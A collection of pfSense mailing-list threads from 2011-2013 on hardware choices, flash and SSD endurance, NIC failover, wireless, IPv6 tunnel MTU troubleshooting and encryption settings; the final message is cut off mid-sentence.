Re: [pfSense] NIC Failover
Most of the issues with STP are dealt with via 802.1w (rapid spanning tree) On Sep 11, 2011, at 9:15 AM, Joseph Hardeman wrote: Hey Everyone, So I can do the failover and yes all of the switches are managed. I did see where to setup the LAGG on the pfSense system. I have to deconfigure the two nics I want to use and then set them up in failover mode I think. On the switch side, I was using 2 separate switches with rapid spanning tree on their uplink ports and ports to the pfSense system to assist in fast failover. I will give it a shot on Monday and see how it goes. Thanks. Joe -Original Message- From: list-boun...@lists.pfsense.org [mailto:list-boun...@lists.pfsense.org] On Behalf Of Chris Buechler Sent: Sunday, September 11, 2011 1:04 AM To: pfSense support and discussion Subject: Re: [pfSense] NIC Failover On Sun, Sep 11, 2011 at 12:46 AM, Austin G. Smith aus...@digitalcompass.com wrote: I have had issues with stp on the firewall in this type setup previously. Mileage may vary for others.. If you're bridging, yeah that can be a concern depending on your config. Failover lagg without bridging won't cause any issues with STP though. May see switches on occasion that have an issue with a MAC quickly moving from one port to another related to its CAM table, or sometimes with security features on the switch, but that's pretty unusual with typical switch configs. And usually in that scenario you're going to be on two diff switches anyway with failover lagg. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Suggestions for embedded hardware
-- Jim On Dec 26, 2011, at 1:38 PM, Chris Buechler c...@pfsense.org wrote: On Mon, Dec 26, 2011 at 1:17 PM, Mike Montgomery m...@cityofscottsburg.com wrote: Hello all, I have been running pfsense at home on an old pc now for some time and loving it. I run several m0n0wall soekris devices at work, but am now looking for a low end pfsense capable device, that as of right now, I am only wanting to use for wirecaptures on my wireless tower sites. Does anyone have suggestions? And do they need hard drives, or could I use flash of some sort? Thanks ALIX would be the lowest end (cheapest) new hardware available. http://store.netgate.com/Desktop-Kits-C82.aspx They run from CF. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense as an 802.11 access point
On Jan 13, 2012, at 8:24 PM, mdh wrote: Hey folks, a few quick questions. 1 If I want to use pfSense as an 802.11g access point, does this work well? It works well-enough. It's not perfect, and there is no 802.11n support, currently. 2 Any specific suggestions on sub-$50 [USD] PCI or USB wireless cards for this purpose? Any to stay away from? External antenna strongly preferred. My ability to contribute here is quite limited. 3 If I wanted to speed up WPA2/AES a bit for a larger number of connections, would a Soekris PCI crypto card be a good choice? Would it be plug-and-play or would I need to change any configs to use it? Would it need any changes to be used for other stuff (like OpenVPN, or other crypto-heavy processes)? Most of the modern 802.11 chipsets have enough on-board crypto-processor to handle AES at full speed. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense error, maybe hard drive?
On Mar 22, 2012, at 2:08, Dimitri Alexandris d.alexand...@gmail.com wrote: On Thu, Mar 22, 2012 at 01:39, Jim Thompson j...@netgate.com wrote: Hmm, No, close, but not really correct. *all* flash will eventually fail if you write to it enough. It's physics. I do not disagree of course. Fine with theory. Theory here is reality. SLC NAND flash is typically rated at about 100k cycles, while MLC NAND flash is typically rated at no more than 10k cycles. Via wear-leveling and over-provisioning ('spare blocks') you can increase these numbers, but no native flash device is rated in terms of millions of erase cycles. You are talking about theory, the memory shell. I talk about the actual flash disks. I believe I mentioned controller stunts to extend the lifetime of the flash. There is a specific mechanism in these industrial flashes, doing exactly this: When it finds an old memory shell refusing to be erased, it re-allocates it (on the fly - transparently) to a healthy / not used sector and marks it bad, much like a hard disk. Read their documentation. Yes, and I discussed this, but better than this is wear-leveling, which works to avoid the issue, rather than reacting to failure. Combine this with some of the advanced error correction, and you can greatly extend the lifetime of (especially MLC-based) flash drives. Apple the same tech to SLC-based drives, and their lifetime shoots up too. So in the end, SLC will still win for endurance if your application does a lot of writes. The controller technology (over provisioning) you describe is at least 2 generations old. It works, but its nowhere near the state of the art. Most CF cards can do the same thing now. (it's the source of the (harmless) FreeBSD error with SanDisk CF cards, which report actual size, and then reserve some percentage of sectors for this remapping.) There are 32.5 million seconds or 8760 hours in a year. Writing once an hour rather than once a second seems like an obvious way to reduce writes. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense error, maybe hard drive?
On Mar 22, 2012, at 10:15 AM, Adam Piasecki wrote: On 3/22/2012 9:52 AM, Jim Thompson wrote: Yes, and I discussed this, but better than this is wear-leveling, which works to avoid the issue, rather than reacting to failure. Combine this with some of the advanced error correction, and you can greatly extend the lifetime of (especially MLC-based) flash drives. I have two questions, 1) Windows has TRIM support for ware-leveling. Does FreeBSD include this? Looking at the wiki page for TRIM (http://en.wikipedia.org/wiki/TRIM) it does not for 8.1, only for low level formatting. No, but FreeBSD 9.0 (which is to be the base for pfSense 2.1) does support TRIM for ffs. http://www.freebsd.org/releases/9.0R/relnotes-detailed.html#FS (answers from previous poster wrt TRIM .vs wear-leveling were also quite good) 2) If 8.1 does not support ware-leveling, would it be recommend that we not use SSD for pfSense until it does? Assuming you're asking about NAND-based SSDs... Just trying to figure out if decent SSD (Not Kingston) would be recommend for pfSense. Some of the better drive/controller combinations use superior forms of garbage collection, have a larger over provision of flash blocks, or are used on systems with a larger percentage of sequential writes .vs random writes. We're evaluating several SSDs here for inclusion on the pfSense systems we sell, but as this is a security appliance, and people tend to depend on it, we're stepping carefully. (This didn't actually answer your question, but I think Chris has already answered it.) Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Pfsense Ipad / Iphone - Android - Smartphone App
I've considered making this type of thing work with the Redpark serial cables. -- Jim On Apr 23, 2012, at 9:45, Robert Guerra rgue...@privaterra.org wrote: An ideal iOS app would be more a configuration and logging tool for pfSense, then one that provides VPN services. -- R. Guerra Phone/Cell: +1 202-905-2081 Twitter: twitter.com/netfreedom Email: rgue...@privaterra.org On 2012-04-23, at 4:37 PM, Gavin Will wrote: Iphone (or at least Ipod touch ) can do pptp and ipsec VPN natively. No need for an app since it uses standards. Works fine for myself the times I need to use it. Gavin From: list-boun...@lists.pfsense.org [mailto:list-boun...@lists.pfsense.org] On Behalf Of justino garcia Sent: 23 April 2012 15:28 To: pfSense support and discussion Subject: [pfSense] Pfsense Ipad / Iphone - Android - Smartphone App Hi Group, I noticed Checkpoint, Cisco, Sonicwall, and bunch of other firewalls have a App for SmartPhones and Tabelts. Any idea for Pfsense, IPSEC ssl vpn app??? I would like simple setup for vpn Thanks, -- Justin IT-TECH ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Low(ish) cost pfSense platforms
On Jun 25, 2012, at 6:45 PM, Diego Barrios s...@techsystem.com.br wrote: Hi Chris, I have the same problem here, need a low-power low-cost solution like the excelent Alix board, but with 4 or more 10/100 ports. After weeks of research I discovered that there is nothing like the Alix boards with more ports =/. You can find some good ARM and PPC solutions with a lot of NICs, but not i386, and unfortunatelly PFsense only runs on Intel platform. Soekris have some good options, they assembly boards (and cases) like Alix, but with a PCI slot you can plug for example a 4-port PCI NIC on it, the problem is the price... too high for a SMB solution with a really slow 233mhz CPU. They have some better CPU but too expensive. http://soekris.com/products/net4801-48-bc-lan1641b.html It's very difficult to get any margin on Soekris boards. The best thing i found was an AAEON (Taiwan) model FWS-2300 with SATA port (so you can run a proxy for example) and 4 GBIT LAN. http://news.thomasnet.com/fullstory/Network-Appliance-is-designed-for-IDS-IPS-UTM-applications-580284 http://www.linuxfordevices.com/c/a/News/Aaeon-FWS2300/ This AAEON FWS-2300 costs aproximatelly USD 300 Aaeon also builds some miniPCI 10/100 or 10/100/1000 Ethernet modules. This would require a custom case, but that's approachable. Were I convinced of a market, I'd order several in and take a stab at a prototype case. That would get you to 4 (3x10/100, 1x10/100 or 1x10/100/1000). But you might be pushing $300 and change to get it all together. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Encrypt Microwave Link?
On Jun 26, 2012, at 4:54 PM, David Burgess apt@gmail.com wrote: That said, it's good practice to keep the beam as narrow as is practical and reduce transmit power accordingly. This reduces the amount of noise you are spreading to the neighbours as well as the probability of others eavesdropping. This is one of those RF engineering things that doesn't belong on the pfSense list. That said, in order to make 802.11's CSMA 'work', the side-lobe strength can't be too low. There are a plethora of issues when working with the 802.11 MAC, which strongly assumes omni antennae and relatively high signal strengths. I just can't allow your statement about keeping beamwidth narrow and tx power (more EIRP) low to stand. With 802.11 devices, if you don't set carrier detect on the other radio's in your field of view, as the population of same increases, it is increasingly likely that one of them will decide to transmit while you're attempting to *receive* a packet, ruining your chances of successful reception, due to the changes in the channel vector. Do this often enough, and the whole thing flatlines. I'm not even going to respond to your probability of others eavesdropping assertion on-list. I've been round and round on these issues (and others (*)) on this list (and others), and it's almost never a 'win'. Ten years ago, I thought I understood radio, and especially 802.11. Then I embarked on a journey staffed with real experts who have forgotten more than I'll ever know on these subjects. I'm not even going to lecture on the difference between noise and interference. This is the pfSense list, and 'Paul' wanted a solution for his *satellite* modems that have an Ethernet hand-off. I don't believe pfSense will do this without running a routed network, which should be fairly straight-forward to do. (Just pretend that the two satellite modems are connected to a LAN. A LAN that happens to have a lot of propagation delay, and not quite as much bandwidth as you would assume, but... a LAN none-the-less.) Running a VPN over that is straight-forward. Jim (*) Often it's the impossibility of using all three 'non-overlapping' channels in 2.4GHz Sure, the transmit masks don't overlap, but you have to look at the in-channel power from adjacent channel (or even alternate channel) operation. Hint: adjacent channel rejection ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Turning UDP broadcast into a unicast on another interface
Without writing a small program? No, I can't think of a way. But it's not a big program, assuming you don't care about the packets on the opposite flow. -- Jim On Oct 2, 2012, at 5:24 PM, Stefan Baur newsgroups.ma...@stefanbaur.de wrote: Hi list, is it possible to have pfSense act upon receiving a UDP broadcast on one specific port on one interface, and turn it into a unicast to a known IP on another interface? And if yes, will I have to set up a second rule so the answer packet reaches its destination on the other interface? -Stefan ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] fast CF cards?
I've got a FIrewire 800-based CF gadget, and the SanDisk cards go very fast while running dd to program them with pfSense. The error, isn't, really. The CF reports its entire size, but has kept some sectors in reserve. freeBSD attempts to access these during boot, and the error results. But nothing bad happened. Netgate uses Kingston for the 4GB cards, and SanDisk for the 2GB cards. -- Jim On Nov 6, 2012, at 11:30 AM, Jim Pingle li...@pingle.org wrote: On 11/6/2012 2:24 PM, David Burgess wrote: My CF card is getting to be a few years old now, and I really should have a backup ready to go. I really hate slow IO in any machine, and I don't like long drawn-out firmware updates (especially since I'm usually up at 4 am doing them). With that in mind, can anybody recommend a CF card with good write speed and good reliability? I'm not interested in paying $100, as this is an itx machine and for that money I could just jump to an SSD. My favourite vendor has a good selection of Kingston, but I really don't like that brand for anything other than RAM. If anybody knows of something decent under $40, I welcome your recommendation. Thanks. I have a Sandisk 200x (30MB/s) 4gb card here that is very speedy. However, it has an annoying quirk with the disk layout that makes FreeBSD spit an error message on every rw mount. Annoying log spam, but it's still speedy. May just be this model, not sure. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] fast CF cards?
On Nov 7, 2012, at 1:59 AM, Chris Bagnall pfse...@lists.minotaur.cc wrote: On the other hand, Transcend cards are usually available for less than 10 GBP, which if you're ordering lots of them, is a consideration. We order a lot of CF (1,000 at a time), we don't buy Transcend or on price alone. We've also never had a Kingston CF fail that I know of. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] How to setup DHCP server so no default gateway specified
On Nov 16, 2012, at 3:04 AM, Will Wagner will_wag...@carallon.com wrote: I guess I'll just have to use something else as the dhcp server on that network. is DHCP relay an option? ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] 2.0.2 release now available
On Dec 21, 2012, at 5:52 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote: On 21/12/12 11:31 pm, James Caldwell wrote: I'm always a little leary of the 'beta' term. Once you guys stamp it as a release quality build I'll move up to it no problem. If you want v6 support, you don't get a lot of choice at the moment :-) FWIW, I've been using 2.1 nightlies in production for the last 6-8 months without any real problems (apart from those minor issues I've mentioned on the list - and both of those only apply to embedded). We dogfood 2.1 at BSD Perimeter as well. :-) ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] WRAP
On Jan 5, 2013, at 11:16 AM, David Burgess apt@gmail.com wrote: On 2013-01-05 4:59 AM, Eugen Leitl eu...@leitl.org wrote: With the speed of courrent connections (100+ MBit/s) lulz. You noticed Hugo is in Canada, eh? To be fair, we can get up to 250 Mbps in a few urban centres, but 6/1 DSL is way more common by my accounting. That said, I ran pfSense on an Atom d510, but found the webUI too sluggish. I expect responsiveness more than routing throughput would be the upgrade driver for most pfSense users, at least here in the great white north. We sell more than a few boxes with D510s. The office is even connected by one. The GUI doesn't seem sluggish on these at all. It is a little pokey on an Alix (Geode). Perhaps something else was at issue? -- Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] mPCIe Recommendations?
Tim, I'm about to attempt the same thing. Will keep you updated. Jim On Feb 11, 2013, at 3:26 PM, Tim Nelson tnel...@rockbochs.com wrote: Greetings- I've just (unsuccessfully) tried setting up an Atheros AR5280 based mPCIe card for use with pfSense 2.0.2. The results were not spectacular. Errors included randomly dropping traffic, dropping carrier, and the infamous scrolling errors 'ath0: stuck beacon...'. So, I'm on a quest for a new card. Suggestions? Can someone tell me a known (guaranteed) working mPCIe interface card that works with pfSense? Use case is simple indoor access point functionality as part of a SOHO firewall. Thanks! --Tim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Microsoft Outlook Blocked
iPhone, iPad and thunderbird may be configured differently than outlook, especially if exchange is involved (or the problem is really with authentication.) See: http://support.microsoft.com/kb/176466 -- Jim On Mar 17, 2013, at 12:06 PM, Gerald Waugh gwa...@frontstreetnetworks.com wrote: On 03/17/2013 12:00 PM, master8...@aol.com wrote: On 3/17/2013 12:13 PM, Gerald Waugh wrote: I have searched the archives, and googled it, but have not found a solution firewall is working great except MS Outlook is being blocked, all other email clients work OK filter.log does not give a clue. no blocking shown for the Outlook users IP Sendmail/Dovecot Server maillog Disconnected: Inactivity (no auth attempts): pfctl -d from cli allows MS Outlook to work OK pfctl -e from cli stops Outlook cleared ports to '*' any TCP/UDP * * * * * none Internet to servers -- Gerald ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list I strongly doubt this is a pfSense problem if other clients work fine. You will need to do a little more troubleshooting here. First thing to confirm my suspicion would be to take pfSense out of the picture and try to connect. thanks for the response, with firewall disabled Outlook will work, with firewall enabled Outlook will not work but thunderbird and ipad, and iphones do work. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list -- Gerald Waugh Front Street Networks (318) 734-4779 (318) 401-0428 ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Microsoft Outlook Blocked
Try hitting Testexchangeconnectivity.com (it's a Microsoft service) or running the Test-OutlookConnectivity tasklet and send the report. But what you have above (below) shows that you're not reaching a POP(3) server at the given IP address. Any chance you're talking to a different DNS server with the firewall on .vs off? -- Jim On Mar 17, 2013, at 6:02 PM, Gerald Waugh gwa...@frontstreetnetworks.com wrote: On 03/17/2013 05:36 PM, Chris Buechler wrote: On Sun, Mar 17, 2013 at 4:47 PM, Ermal Luçi e...@pfsense.org wrote: Try enabling on the rule to allow ip options. It might be that the packets are being dropped due to having ip options in them. Outlook shouldn't be using IP options, we'd have had a flood of problem reports if that were the case with any degree of consistency. Without having a packet capture it's hard to say. My guess based on the description is the machine with Outlook has a network misconfiguration of sorts where its traffic isn't hitting the firewall Thanks for the response. It is several Outlook IPs that will not work correctly. the outlook client connects but does not complete and error on server is no auth attempts error on the client: Task 'u...@domain.com - Receiving' reported error (0x8004210A) : 'The operation timed out waiting for a response from the receiving (POP) server. If you continue to receive this message, contact your server administrator or Internet service provider (ISP).' ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Open Source WAN Optimization
On Apr 12, 2013, at 12:42 PM, Warren Baker war...@decoy.co.za wrote: On Fri, Apr 12, 2013 at 4:50 PM, James Caldwell jamescaldw...@hurricanecs.com wrote: Has anyone had any kind of success running an open source or commercial alternative to riverbed for WAN optimization? It would be great if some of solution like this was available and even better if we could run it inside of pfsense. Cheers. There is WANProxy http://wanproxy.org/ but never used it so can't comment on its performance or how well it works. Chris and I have recently discussed adding WANproxy to the mix. Maybe not as part of pfSense, but certainly in the same mold. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Open Source WAN Optimization
On Apr 12, 2013, at 2:36 PM, James Caldwell jamescaldw...@hurricanecs.com wrote: Hi Jim, That’s very interesting. If not directly integrated into pfsense how do you envision it might take shape? In general I'm not ready to discuss pfSense futures on list. However, if you think of pfSense as an appliance platform, you will be on the right track. What do you think of Glenn Kelley’s comment about the very impressive numbers he’s been getting using Traffic Squeezer? Impressive, but it's data dependent, of course. Jim James From: list-boun...@lists.pfsense.org [mailto:list-boun...@lists.pfsense.org] On Behalf Of Jim Thompson Sent: April-12-13 1:32 PM To: pfSense support and discussion Cc: pfSense support and discussion Subject: Re: [pfSense] Open Source WAN Optimization On Apr 12, 2013, at 12:42 PM, Warren Baker war...@decoy.co.za wrote: On Fri, Apr 12, 2013 at 4:50 PM, James Caldwell jamescaldw...@hurricanecs.com wrote: Has anyone had any kind of success running an open source or commercial alternative to riverbed for WAN optimization? It would be great if some of solution like this was available and even better if we could run it inside of pfsense. Cheers. There is WANProxy http://wanproxy.org/ but never used it so can't comment on its performance or how well it works. Chris and I have recently discussed adding WANproxy to the mix. Maybe not as part of pfSense, but certainly in the same mold. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Best practice for SSD installs
On Jun 7, 2013, at 7:06 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote: Thanks for the response. On 8/6/13 12:54 am, Jim Thompson wrote: Difficulty? Is this some kind of Brit understatement? Impossible is a more accurate description of the situation. :-) I've seen other AMD Geode boards with 4 NICs, but not with 256MB RAM, and we've been seeing issues with =256MB and 2.1. Load the CD-based installer on an SSD. If you use a USB DOM, you'll want to use the 'embedded' image. But the full install for an SSD? Or is it better to stick with embedded on those too? full install, yes. embedded is all about reducing writes to the CF. One other thing I thought I might try is using an USB flash device. I notice from the snapshots there's an image available for these devices, but I can't seem to find much by the way of documentation online about the benefits/pitfalls of this approach. That image is an 'installer' image. Is it possible to 'install' pfSense to a bootable USB flash device at all? Strikes me as a wonderfully elegant solution for updates: just ship a new stick to the remote site and tell someone to plug it in and reboot :-) until it falls out. The Realtek NICs might not work in 2.0 series releases.2.1RC is likely a better option. Running 2.1 anyway - v6 support very much required :-) FWIW, I've tested one of these boards this evening just using a spare 2.5 SATA spinning disk I had knocking around here, and both the Realtek and Intel NICs seem to be working in 2.1. I've not put any load through them yet, so I can't attest to performance. Given most of these systems are going to be handling very low throughput (100Mbps WAN links), is it safer to just disable all the offloading options to be on the safe side? That's what the rest of the list will advise. They'll all claim that these hardware features don't work. Nevermind that they work on other platforms. This gets spun into fokelore on the list. The OpenBSD guys were just discussing how they *made* them work at BSDcan though. http://www.bsdcan.org/2013/schedule/events/372.en.html So there is hope that FreeBSD will study same and implement fixes. Jim___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Best practice for SSD installs
On Jun 8, 2013, at 2:24 PM, Michael Schuh michael.sc...@gmail.com wrote: i wouldn't only rely on the manufacturer but on the chip type; just saying If by 'chip' you mean 'controller', I agree. If by 'chip' you mean the actual flash (memory), then… you're likely mistaken. Intel and Micron are the same thing. (Micron is a second source for Intel flash.) Other manufacturers (Samsung, etc) also make quality flash parts. I suppose there could be some seconds coming out of China, but if you buy the bottom of the price curve, you deserve what you get. Many people who complain about SSD reliability have either mis-used the technology, (e.g. write amplification rears it's ugly head) or have purchased the cheapest SSD they can find, and then complain when the the part fails. The upthread advice about Intel SSDs is sound. Now that the Sandforce controller debacle is over, Crucial (who are really a rebrand of Micron (see above)) and Samsung also make good, reliable SSDs. As a none-too-subtle hint: there are reasons why Netgate has, to date, not shipped SSD (or SSD-like) technology in our pfSense-powered appliances. It's not that we didn't know how, but rather the difference between product and technology demonstration. If you're only concerned with making one, or a dozen, for your own use, the effects of your decision are limited. When you're making 1,000s of units per year, the weight of the decisions caries real monetary consequences. Also note that phk was discussing flash parts a lot more like 'Compact Flash' or USB flash than SSDs in that document, while this thread has been about using SSDs. Apples != Oranges (Just sayin'). Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Best practice for SSD installs
On Jun 9, 2013, at 3:44 PM, Michael Schuh michael.sc...@gmail.com wrote: 2013/6/9 Jim Thompson j...@smallworks.com On Jun 8, 2013, at 2:24 PM, Michael Schuh michael.sc...@gmail.com wrote: Intel actually sells MLC instead of SLC ( iirc they had a series with SLC but they are to expensive, not sure if they sell those further ) They do. As you note, they are more expensive per bit than MLC. Intel SSD (actual series afaik MLC) compensate the different endurance with more memory-chips and the controller software that round-robins the writings over the entire disk except a reserved space for dying cells. Same as it ever was. Wear-leveling. And yes there are manufacturers with much cleaner production and higer quality of the memory-chips. Did I not say, Intel, Crucial/Micron, Samsung? Jim___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] IPv6 HE.net tunnel - MTU problem confirmed
On Aug 15, 2013, at 12:13 PM, Adam Hunt voxa...@gmail.com wrote: Thanks for confirming this. I'm glad that I'm not the only one and/or I'm not completely inept. I'll sit down later today and play with the various MTU settings (WAN, HEv6 tunnel, and the setting on the advanced tab of Tunnel Broker's site) and see what, if anything, I can get to work consistently. I don't know what browser you use but I found a simple Chrome extension that has been helpful in determining what protocol (v4/v6) is being using used to connect to any specific site. It's called IPvFoo and is available in the webstore (http://goo.gl/kxKVhx). It adds a little 4 or 6 icon on the right of the URI bar that when clicked on shows what portions of the page were served using what protocol. Again, thanks for confirming this. At certain points I was beginning to doubt myself as things would work on second and break for seemingly no reason the next. --adam On Thu, Aug 15, 2013 at 9:51 AM, Adam Thompson athom...@athompso.net wrote: I'm having the same problem as a recent reporter (whose email I already can't find). I've got a tunnel set up to HE.NET, and experience difficulty browsing to (e.g.) redmine.pfsense.org. Testing shows that the largest ICMP payload I can exchange is 1232 bytes (ping -l 1232 redmine.pfsense.org works, 1233 doesn't). If I stop and reload the page in my browser, everything works fine - I don't know yet if that's because the browser falls back to IPv4 or because the MTU problem suddenly fixes itself. -Adam Thompson athom...@athompso.net Tel: (204) 291-7950 Fax: (204) 489-6515 Hi Adam (and Adam), Seems easy enough to reproduce, assuming that my substitution of '-s' for '-l' is legit. jims-mini:~ jim$ ping6 -s 1232 redmine.pfsense.org PING6(1280=40+8+1232 bytes) 2610:160:11:33:84b5:f958:6545:af1c -- 2610:160:11:3::100 1240 bytes from 2610:160:11:3::100, icmp_seq=0 hlim=62 time=1.625 ms ^C --- redmine.pfsense.org ping6 statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 1.625/1.625/1.625/0.000 ms jims-mini:~ jim$ ping6 -s 1233 redmine.pfsense.org PING6(1281=40+8+1233 bytes) 2610:160:11:33:84b5:f958:6545:af1c -- 2610:160:11:3::100 ^C --- redmine.pfsense.org ping6 statistics --- 4 packets transmitted, 0 packets received, 100.0% packet loss Note that I'm … really close. jims-mini:~ jim$ traceroute6 redmine.pfsense.org traceroute6 to redmine.pfsense.org (2610:160:11:3::100) from 2610:160:11:33:84b5:f958:6545:af1c, 64 hops max, 12 byte packets 1 2610:160:11:33::2 1.888 ms 1.861 ms 1.461 ms 2 2610:160:11:12::2 1.984 ms 2.107 ms 2.303 ms 3 2610:160:11:3::100 2.172 ms 2.275 ms 2.250 ms jims-mini:~ jim$ Given same, it almost has to be the pfSense box, since once I'm on redmine, huge packets pass. jim@redmine:/home/jim % traceroute6 -n he.net traceroute6 to he.net (2001:470:0:76::2) from 2610:160:11:3::100, 64 hops max, 12 byte packets 1 2610:160:11:3::2 0.381 ms 0.336 ms 0.349 ms 2 2610:160:11::1 4.210 ms 1.249 ms 2.435 ms 3 2610:160:0:11::4 2.556 ms 2.611 ms 0.993 ms 4 2610:160:0:53::17 10.253 ms 10.212 ms 10.408 ms 5 2001:504:0:5::6939:1 12.735 ms 10.145 ms 15.192 ms 6 2001:470:0:258::1 32.502 ms 27.384 ms 27.439 ms 7 2001:470:0:24a::2 62.184 ms 43.638 ms 43.681 ms 8 2001:470:0:16a::1 53.841 ms 46.596 ms 53.421 ms 9 2001:470:0:2f::1 59.776 ms 2001:470:0:18d::1 46.394 ms 46.766 ms 10 2001:470:0:2d::1 55.180 ms 49.954 ms 49.308 ms 11 2001:470:0:76::2 50.513 ms 50.814 ms 50.959 ms jim@redmine:/home/jim % sudo ping6 -s 3500 redmine.pfsense.org PING6(3548=40+8+3500 bytes) 2610:160:11:3::100 -- 2610:160:11:3::100 3508 bytes from 2610:160:11:3::100, icmp_seq=0 hlim=64 time=0.106 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=1 hlim=64 time=0.074 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=2 hlim=64 time=0.076 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=3 hlim=64 time=0.069 ms 3508 bytes from 2610:160:11:3::100, icmp_seq=4 hlim=64 time=0.074 ms ^C --- redmine.pfsense.org ping6 statistics --- 5 packets transmitted, 5 packets received, 0.0% packet loss round-trip min/avg/max/std-dev = 0.069/0.080/0.106/0.013 ms jim@redmine:/home/jim % That said, I'm on redmine with IPvFoo loaded, and it's reporting that I'm hitting the IPv6 site, and I'm not having any issues. We'll look into it and get back to you. jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
On Sep 5, 2013, at 7:57 AM, Jim Pingle li...@pingle.org wrote: But it doesn't matter if the vendors issue a patch, people actually have to install the update to fix it, and odds are high that typical end users have no idea that is even possible or something they have to do. This speaks to a service that keeps the software updated. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
Read ‘em and weep: http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?_r=0 My take is that most places don’t enable PFS (because it’s “hard”) in IPSec. In theory, Transport Layer Security (TLS) can choose appropriate ciphers since SSLv3, but in everyday practice many implementations have refused to offer PFS or only provide it with very low encryption grade. http://www.ietf.org/mail-archive/web/tls/current/msg02134.html I don’t know the situation on pfSense (I’ve not gone to look, as I’m elbows deep in an IPv6 IPsec issue atm.) In theory, OpenSSL supports perfect forward secrecy using elliptic curve Diffie–Hellman since version 1.0. Do we set enable-ec_nistp_64_gcc_128” on pfSense? Do we enable the DHE-RSA-AES128-SHA cipher suite? How about ECDHE-RSA-AES128-SHA? Do we build the 64-bit optimized version for 64-bit images? http://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.html Anyway, the ‘evidence’ is that there is some fundamental weakness in DH, since the NSA itself recommends EC crypto rather than DH in their “Suite B” offering. http://www.nsa.gov/ia/programs/suiteb_cryptography/ One would think that pfSense would follow suit. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
On Sep 5, 2013, at 12:08 PM, Mark Tinka mark.ti...@seacom.mu wrote: On Thursday, September 05, 2013 04:55:31 PM Jim Pingle wrote: I'm not opposed to auto-update if it's done securely and opt-in. Especially if you can schedule the time it takes place (e.g. specific day, specific time frame). The problem with updating router/switch software, as you know, is that you can't guarantee that what was working before won't be broken after the update. In addition to the downtime (large routers and switches can take several, several minutes to boot), a lot of service providers won't update for this reason. Wait, wait. Show me, again where pfSense is used in a non-trivial service provider environment in a position where it actually routes traffic. And show me again where auto-update was *required*, rather than an option? That said, the vendors tend to issue workarounds that don't require software updates, and as such, reboots. This is not always the case, and in some scenarios, a software update is your only option. Vendors have attempted in-service updates (ISSU and friends), but this is not very practical as of now, and tends to work less often than not. It’s all doable. (It’s just software.) but it’s decidedly non-trivial. Monitoring your infrastructure with simple tools like RANCID is an effective and quick way to know what has changed on your network, so you can investigate any potential breaches. Unlike laptops and desktops, the latest software for routers and switches isn't always the greatest :-). if by “isn’t 